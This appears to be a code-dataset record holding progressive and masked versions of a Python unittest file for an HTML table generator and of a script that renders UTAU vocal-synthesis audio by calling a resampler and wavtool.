, gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom Spreadsheet.HTML import Table\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom Spreadsheet.HTML import Table\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate(),\n \"colgroup present from generate()\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',\n gen.generate( { 'tgroups': 2 } ),\n \"colgroup present from generate() with tgroups\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None } ),\n \"colgroup can be overriden\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': 1 } ),\n \"colgroup yields no-op if scalar\"\n )\n\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),\n \"can specify multiple colgroups\"\n )\n\n\n def test_col(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': {} } ),\n \"colgroup wraps col\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': [{},{},{}] } ),\n \"colgroup wraps multiple cols\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None, 'col': {} } ),\n \"colgroup can be overriden when col is present too\"\n )\n\n\n gen = Table( { 'data': data, 'col': [{},{},{}] } );\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': {} } ),\n \"multiple cols against single colgroup\"\n )\n\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),\n \"no cols against multiple colgroups\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col 
/></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [{},{},{}] } ),\n \"multiple cols against multiple colgroups\"\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
<|reserved_special_token_0|>
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
<|reserved_special_token_0|>
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = 'filet.ust'
OTO_FILE = 'Voice\\NanaMio\\oto.ini'
VB_PATH = 'Voice\\NanaMio'
RESAMPLER_PATH = 'Resampler\\macres.exe'
WAVTOOL_PATH = 'Resampler\\wavtool-yawu.exe'
CACHE_PATH = 'Cache\\'
OUTPUT_FILE = 'temp.wav'
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
from Modules.Pitch.Factory import MainFactory
from Modules.ToJson import Oto
from audiolazy.lazy_midi import midi2str
import utaupy
import string
import random
import math
import os, subprocess, shutil
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = 'filet.ust'
OTO_FILE = 'Voice\\NanaMio\\oto.ini'
VB_PATH = 'Voice\\NanaMio'
RESAMPLER_PATH = 'Resampler\\macres.exe'
WAVTOOL_PATH = 'Resampler\\wavtool-yawu.exe'
CACHE_PATH = 'Cache\\'
OUTPUT_FILE = 'temp.wav'
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
from Modules.Pitch.Factory import MainFactory
from Modules.ToJson import Oto
from audiolazy.lazy_midi import midi2str
import utaupy
import string
import random
import math
import os, subprocess, shutil
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = "filet.ust"
OTO_FILE = "Voice\\NanaMio\\oto.ini"
VB_PATH = "Voice\\NanaMio"
RESAMPLER_PATH = "Resampler\\macres.exe"
WAVTOOL_PATH = "Resampler\\wavtool-yawu.exe"
CACHE_PATH = "Cache\\"
OUTPUT_FILE = "temp.wav"
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
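# create (or empty) the output wav before rendering; each wavtool call below writes the next note segment into it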
open(OUTPUT_FILE, "w+")
for NIndex, Note in enumerate(UstParts):
print("prevnote", PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto["PreUtterance"]) if not Rest else 0
Velocity = Note.velocity
# try:
# PreUtterance = Note.get_by_key("PreUtterance")
# except KeyError:
# PreUtterance = 0
try:
StartPoint = Note.get_by_key("StartPoint")
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note["PBW"].split(",")
except KeyError:
PBW = None
try:
PBY = Note["PBY"].split(",")
for Index, Var in enumerate(PBY):
if Var == "":
PBY[Index] = "0"
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key("VBR").split(",")
except KeyError:
VBR = None
try:
Flags = Note.get_by_key("Flags")
except KeyError:
Flags = "?"
try:
Modulation = Note.get_by_key("Modulation")
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key("Intensity")
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key("StartPoint")
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key("Envelope")
Envelope = Envelope.replace("%", LocalOto["Overlap"]).split(",")
except (KeyError, TypeError):
Envelope = ["0","5","35","0","100","100","0"]
FileOrder = f"{NIndex:05}"
if Rest:
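		# rest notes skip the resampler and go straight to wavtool with an all-zero envelope;
		# OutputFile still holds the previous iteration's path, so a rest as the very first note would fail with a NameError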
# Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH),os.path.join(os.getcwd(), CACHE_PATH, SILENCE_FILE), os.path.join(os.getcwd(),f"{FileOrder}_Blank_{RandomString(6)}.wav"),utaupy.ust.notenum_as_abc(NoteNum),"100","?","0",str(int(Length//50 *50 if Length/50 - Length//50 < 0.5 else math.ceil(Length/50) * 50)),"0","0","100","0"]
# Segment = AudioSegment.silent(duration=Length)
WavtoolParam = [
os.path.join(os.getcwd(), WAVTOOL_PATH),
os.path.join(os.getcwd(), OUTPUT_FILE),
OutputFile,
str(MSPassed),
str(Length)
] + (["0"] * 11)
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
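		# build the pitch-bend curve for this note and render it into the pitch string handed to the resampler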
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW, PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed + PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / 5)), NoteNum)
else:
PitchBendData = None
# Bite Correction (The previous note should last for half the length before overlap)
if PreUtterance - float(LocalOto["Overlap"]) > (PreviousLength // 2):
CorrectionRate = (PreviousLength // 2) / (PreUtterance - float(LocalOto["Overlap"]))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto["Overlap"]) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto["Overlap"])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto["Consonant"]):
LengthRequire = float(LocalOto["Consonant"])
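		# round the required render length to the nearest multiple of 50 before passing it to the resampler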
LengthRequire = LengthRequire//50 *50 if LengthRequire/50 - LengthRequire//50 < 0.5 else math.ceil(LengthRequire/50) * 50
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto["File"])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH, f"{FileOrder}_{Lyric}_{RandomString(6)}.wav")
Parameters = [
os.path.join(os.getcwd(), RESAMPLER_PATH),
InputFile,
OutputFile,
midi2str(NoteNum),
str(Velocity),
Flags,
LocalOto["Offset"],
str(int(LengthRequire)),
LocalOto["Consonant"],
LocalOto["Cutoff"],
Intensity,
Modulation,
f"!{Tempo}" if PitchBendData is not None else "",
f"{PitchBendData}" if PitchBendData is not None else ""
]
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
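		# length correction passed to wavtool below: this note's preutterance, minus the next note's (preutterance - overlap) when the next lyric has an oto entry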
if NIndex + 1 < len(UstParts) and UstParts[NIndex+1].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex+1].lyric]
NextPreUtterance = float(NextOto["PreUtterance"])
NextOverlap = float(NextOto["Overlap"])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = "+" if WavtoolCorrection >= 0 else ""
WavtoolParam = [
os.path.join(os.getcwd(), WAVTOOL_PATH),
os.path.join(os.getcwd(), OUTPUT_FILE),
OutputFile,
str(float(StartPoint)),
f"{Length}@{float(Tempo)}{sign}{WavtoolCorrection}"
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
|
flexible
|
{
"blob_id": "ce11a5c2fbd6e0ea0f8ab293dc53afd07a18c25c",
"index": 6160,
"step-1": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\n<mask token>\n",
